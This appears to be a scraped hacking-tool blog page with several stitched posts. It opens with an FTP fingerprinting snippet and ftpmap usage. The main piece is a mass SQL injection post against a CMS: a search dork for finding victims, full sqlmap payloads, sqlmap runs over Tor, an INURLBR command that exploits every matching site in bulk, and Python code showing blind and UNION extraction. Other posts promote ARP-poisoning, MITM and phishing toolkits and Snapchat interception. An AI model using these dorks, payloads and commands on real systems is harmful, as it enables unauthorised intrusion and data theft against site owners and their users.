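    ftp.connect(host, port, timeout=10)
    ftp.login(user, password)

    def send(cmd: str) -> str:
        try:
            return ftp.sendcmd(cmd)
        except ftplib.error_perm as e:        # 5xx replies are raised, not returned
            return str(e)
    return send


def fake_vsftpd_with_changed_banner(cmd: str) -> str:
    """Constructed server: banner rewritten to look like ProFTPD, replies unchanged."""
    replies = {
        "BANNER": "220 ProFTPD 1.3.5 Server ready.",
        "SYST": "215 UNIX Type: L8",
        "XYZZY": "500 Unknown command.",
        "FEAT": "211-Features:\r\n EPRT\r\n EPSV\r\n211 End",
        "HELP": "214-The following commands are recognized.\r\n ABOR\r\n214 Help OK.",
    }
    return replies.get(cmd, "500 Unknown command.")


if __name__ == "__main__":
    print(fingerprint(fake_vsftpd_with_changed_banner))
```

The unknown-command probe carries most of the signal: servers agree on the 500 code but almost never on the wording, and that wording is not something an administrator usually thinks to change.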

How to compile it?

./configure

make

make install


Usage

Options:

  • -s     - the FTP server.
  • -P     - the FTP port (default: 21).
  • -u     - FTP user (default: anonymous).
  • -p     - FTP password (default: NULL).
  • -x     - run a command on the FTP server.
  • -v     - show version information and quit.
  • -h     - show help and quit.


Examples

ftpmap -s ftp.c9x.org

ftpmap -P 2121 -s 127.0.0.1

ftpmap -u joe -p joepass -s ftp.server

ftpmap -u joe -p joepass -s ftp.server -x "SYST"


Download Link:
https://github.com/Hypsurus/ftpmap


About the Author :
Christian Galeone is a cyber security researcher from Italy, currently studying at I.I.S.S. Marco Polo (a vocational technical institute), attending the IT class.
He has been acknowledged by top companies including Yahoo!, Microsoft, AT&T and Sony. He currently works with HOC as an author of cyber security and critical tools research articles.



~ Monday 1 June 2015

Exploring CMS With SQLMap + INURL BR Mass



In this article we look at one SQL injection pattern in a company's CMS. We use sqlmap for the SQL injection and the INURL scanner to find targets in bulk.

For those not familiar with it: INURLBR was developed by HackersOnlineClub member Cleiton Pinheiro to automate detailed searches with search engines using special security-oriented search operators (dorks).

[+] Dork:      
intext:"Aadi" & inurl:"page.php?id="

[+] POC:      
http://www.target.com/page.php?id=1+XPL_SQLI

[+] Exploit:
sqlmap detection output:

Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 1630=1630 AND 'DBoa'='DBoa
Vector: AND [INFERENCE]

Type: error-based

Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: id=1' AND (SELECT 3932 FROM(SELECT COUNT(*),CONCAT(0x717a627671,(SELECT (ELT(3932=3932,1))),0x716a6b7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'wUln'='wUln
Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

Type: AND/OR time-based blind

Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: id=1' AND (SELECT * FROM (SELECT(SLEEP(10)))HrzP) AND 'jmET'='jmET
Vector: AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])

Type: UNION query

Title: Generic UNION query (NULL) - 5 columns
Payload: id=1' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x717a627671,0x465169724a72556d4e4f,0x716a6b7071),NULL-- 

    Vector:  UNION ALL SELECT NULL,NULL,NULL,[QUERY],NULL-- 

[+] Login Page: 
http://www.test.com/admin

[+] EXPLORING WITH SQLMAP:
sqlmap.py -u 'http://www.target.com/page.php?id=1' -p id --random-agent --beep --level 3 --risk 2 --threads 2 --tor --check-tor --tor-type=SOCKS5 --dbs --dbms='Mysql' --time-sec 10 --batch


[+] EXPLORING WITH MASS INURLBR:
php inurlbr.php --dork 'intext:"Aadi" & inurl:"page.php?id="' -s aadi.txt  -q 1,6 --exploit-get "?&id=1%270x27" --command-vul "sqlmap.py -u '_TARGETFULL_' -p id --random-agent --beep --level 3 --risk 2 --threads 2 --tor --check-tor --tor-type=SOCKS5 --dbs --dbms='Mysql' --time-sec 10 --batch"

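As an added example (not from the original article), the following Python reproduces the injection pattern behind the sqlmap output above on a constructed SQLite database: the page.php?id= style query with the parameter pasted into a quoted literal, the boolean-based blind inference that "AND [INFERENCE]" stands for, the UNION vector, and the parameterised query that closes the hole. The schema, the table contents and the SQLite-flavoured UNION payload are assumptions; the MySQL-specific error-based and time-based payloads from the output have no SQLite equivalent and are not reproduced.

```python
import sqlite3

PRINTABLE = range(0x20, 0x7F)


def make_db() -> sqlite3.Connection:
    """Constructed sample schema standing in for the CMS database."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE pages(id INTEGER PRIMARY KEY, title TEXT, body TEXT);
        CREATE TABLE users(id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO pages VALUES (1, 'Home', 'Welcome');
        INSERT INTO users VALUES (1, 'admin', 's3cret');
    """)
    return db


def page_vulnerable(db, id_param: str):
    # page.php?id= done the wrong way: the parameter is pasted into the SQL
    # text inside a quoted literal, which is exactly the context the payloads
    # on this page (1' AND ... AND 'DBoa'='DBoa) are built for.
    sql = "SELECT title, body FROM pages WHERE id='%s'" % id_param
    return db.execute(sql).fetchall()


def page_safe(db, id_param: str):
    # Bound parameter: the value is data and can never become SQL syntax.
    return db.execute("SELECT title, body FROM pages WHERE id=?", (id_param,)).fetchall()


def blind_extract(oracle, subquery: str, max_len: int = 32) -> str:
    """Boolean-based blind inference ("Vector: AND [INFERENCE]"): recover the
    result of `subquery` one character at a time from yes/no answers.
    `oracle(payload)` returns True when the page behaves as for a true condition."""
    out = ""
    for pos in range(1, max_len + 1):
        for code in PRINTABLE:
            payload = "1' AND unicode(substr((%s),%d,1))=%d AND 'x'='x" % (subquery, pos, code)
            if oracle(payload):
                out += chr(code)
                break
        else:
            break                       # no character matched: end of the string
    return out


def demo() -> dict:
    db = make_db()
    true_cond = "1' AND 1630=1630 AND 'DBoa'='DBoa"     # payload shown on this page
    false_cond = "1' AND 1630=1631 AND 'DBoa'='DBoa"
    return {
        "vulnerable_true": page_vulnerable(db, true_cond),
        "vulnerable_false": page_vulnerable(db, false_cond),
        "safe_true": page_safe(db, true_cond),
        # UNION query: SQLite equivalent of the "UNION ALL SELECT" vector above
        "union": page_vulnerable(db, "1' UNION ALL SELECT username, password FROM users-- "),
        "blind": blind_extract(lambda p: bool(page_vulnerable(db, p)),
                               "SELECT password FROM users WHERE username='admin'"),
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(k, v)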


[+] Discoverer Author: Killer~X
[+] EMAIL: M_ox@hotmail.com
[+] FACEBOOK: http://www.fb.com/xXalreshyXx
[+] ASK: http://www.ask.fm/ALRESHY

Source:
http://www.exploit4arab.net/exploits/1486

~ dimanche 10 mai 2015 0 commentaires

Nuke-IOS An Auditing Tool To Test ARP Attacks For iOS


Nuke-IOS An Auditing Tool To Test ARP Attacks For iOS.

Its an auditing tool to test ARP attacks, can easily be avoided using Static-ARP entries on hosts or with AP isolation. Nuke-IOS (beta) Automated ARP poisoning script for IOS.

What Is ARP Poisoning?
ARP Poisoning attack is a type of attack. Generally, the aim is to associate the attacker's MAC address with the IP address of another host, such as the default gateway, causing any traffic meant for that IP address to be sent to the attacker instead.

ARP spoofing may allow an attacker to intercept data frames on a network, modify the traffic, or stop all traffic. Often the attack is used as an opening for other attacks, such as denial of service, man in the middle, or session hijacking attacks.

The attack can only be used on networks that use the Address Resolution Protocol.  Soon its support for SBsettings toggle, yes, one simple button that takes down an entire /24 network in seconds.

Depends on:
mptcp network-cmds

Download

~ mercredi 4 mars 2015 0 commentaires

Nettool.sh - Automate frameworks For Nmap, Driftnet, Sslstrip, Metasploit And Ettercap MITM Attacks



Nettool.sh  - Automate frameworks For Nmap, Driftnet, Sslstrip, Metasploit And Ettercap MITM Attacks.

Netool.sh toolkit provides a fast and easy way For new arrivals to IT security pentesting and also to experience users to use allmost all features that the Man-In-The-Middle can provide under local lan, since scanning, sniffing and Social engineering attacks "[spear phishing attacks]"...

Netool its a toolkit written using 'bash, python, ruby' that allows you to automate frameworks like Nmap, Driftnet, Sslstrip, Metasploit and Ettercap MitM attacks. This toolkit makes it easy tasks such as SNIFFING tcp/udp traffic, Man-In-The-Middle attacks, SSL-sniff, DNS-spoofing, DoS attacks in wan/lan networks, TCP/UDP packet manipulation using etter-filters, and gives you the ability to capture pictures of target webbrowser surfing (driftnet), also uses macchanger to decoy scans changing the mac address.

Operative Systems Supported are:
Linux-ubuntu, kali-linux, backtack-linux (un-continued), freeBSD, Mac osx (un-continued)

Rootsector module allows you to automate some attacks over DNS_SPOOF + MitM (phishing - social engineering) using metasploit, apache2 and ettercap frameworks. Like the generation of payloads, shellcode, backdoors delivered using dns_spoof and MitM method to redirect a target to your phishing webpage. recent as introducted the scanner inurlbr (by cleiton). This tool brought to you by: peterubuntu10

Video:


Download

~ vendredi 20 février 2015 0 commentaires

NoGoToFail: A Network Security Testing Tool For HTTPS And TLS/SSL Bugs


NoGoToFail: A Network Security Testing Tool For HTTPS and TLS/SSL Bugs. An on-path blackbox network traffic security testing tool.

Nogotofail is a network security testing tool designed to help developers and security researchers spot and fix weak TLS/SSL connections and sensitive cleartext traffic on devices and applications in a flexible, scalable, powerful way. It includes testing for common SSL certificate verification issues, HTTPS and TLS/SSL library bugs, SSL and STARTTLS stripping issues, cleartext issues, and more.

Design

Nogotofail is composed of an on-path network MiTM and optional clients for the devices being tested. See docs/design.md for the overview and design goals of nogotofail.

Dependencies

Nogotofail depends only on Python 2.7 and pyOpenSSL>=0.13. The MiTM is designed to work on Linux machines and the transparent traffic capture modes are Linux specific and require iptables as well.

Additionally the Linux client depends on psutil.

According to Google blog,
"Google is committed to increasing the use of TLS/SSL in all applications and services. But “HTTPS everywhere” is not enough; it also needs to be used correctly. Most platforms and devices have secure defaults, but some applications and libraries override the defaults for the worse, and in some instances we’ve seen platforms make mistakes as well. As applications get more complex, connect to more services, and use more third party libraries, it becomes easier to introduce these types of mistakes.

The Android Security Team has built a tool, called nogotofail, that provides an easy way to confirm that the devices or applications you are using are safe against known TLS/SSL vulnerabilities and misconfigurations. Nogotofail works for Android, iOS, Linux, Windows, Chrome OS, OSX, in fact any device you use to connect to the Internet. There’s an easy-to-use client to configure the settings and get notifications on Android and Linux, as well as the attack engine itself which can be deployed as a router, VPN server, or proxy."

Download

~ mardi 9 décembre 2014 0 commentaires

Do you think HTTPS is Secure? But its Not !


Do you think HTTPS is Secure? But its Not !

Do you want to test your Server for BEAST & CRIME Attacks?

Do you want to have an overview on how secure is your encryption also indicating the Supported Suites & Protocols?

TestSSLServer will give you all of them in just one tool!.

All you have to do is visit their main website:

Link: http://www.bolet.org/TestSSLServer/

Then run which package you desire:

-) Java Application

   Link: http://www.bolet.org/TestSSLServer/TestSSLServer.jar

-) Windows Executable Version

   Link: http://www.bolet.org/TestSSLServer/TestSSLServer.exe

Once you will have downloaded it, just drag the app into the Windows Command-Promt and press Enter:


When you are there, you will need to enter the server details, for this use this syntax:

usage: TestSSLServer servername [ port ]

Example: mysubdomain.apple.com 443 **(You can also insert your local address if you have any Server running into it)



As you can see, one of Apple's subdomain is Vulnerable to POODLE Attack since it has SSLv3 Enabled.

It can be attacked from the HTTPS Secure Port - :443 .

We can see that the Vulnerable SSLv3 Cipher Suites are:

RSA_WITH_RC4_128_SHA
RSA_WITH_AES_128_CBC_SHA
RSA_WITH_AES_256_CBC_SHA

...but our Target is also Vulnerable to BEAST Attack as reported below!.

BEAST status: vulnerable

But it's not the end!.

This great Tool also give you relevant informations regarding the Security of your Keys!

My target got it STRONG, it means that a Possible Attacker may concour in some difficulties for Crack the Server Key!.

See Below!:

Minimal encryption strength:    strong encryption (96-bit or more)
Achievable encryption strength: strong encryption (96-bit or more)

If is STRONG, The Hacker may be not facilited but NOT unabilited for CRACK your Web-Server Keys.

At the end, this tool also give you the details about the Security Certificate that the server is running!.

Example mine comes from Cupertino, California!.

Definitively, you should try it at all!.

About the Author :
Christian Galeone is a Cyber Security Researcher from Italy. He has been acknowledged by the TOP 5 Companies including Yahoo!, Microsoft, AT&T, Sony etc.


~ mardi 21 octobre 2014 0 commentaires

Snapception: Intercept and Decrypt All Snapchats Received Over Your Network


Snapception: Intercept and decrypt all Snapchats received over your network.


Installing is easy:

pip install snapception 

Starting it is easy too:

snapception --help
Usage: snapception [OPTIONS]

Options:

  -v, --verbose        Enable logging
  -vv, --very-verbose  Include mitmdump in logging
  -o, --output TEXT    Specify output directory (Default is ~/snaps)
  --help               Show this message and exit.

Configuring:

Configure your device to use a proxy pointing to Port 8080 of the host computer
Install a CA on your device by visiting mitm.it once connected to the proxy
Watch all the Snapchats you receive over the network become available on your computer.

Snapception, intercepts all snapchats received over the network so long as the receiving device is connected to the computer running Snapception via a proxy. Those applications also require you to manually login and save your snapchat before officially opening it; Snapception automatically intercepts, decrypts, and saves your received snaps.

Download

~ mardi 14 octobre 2014 0 commentaires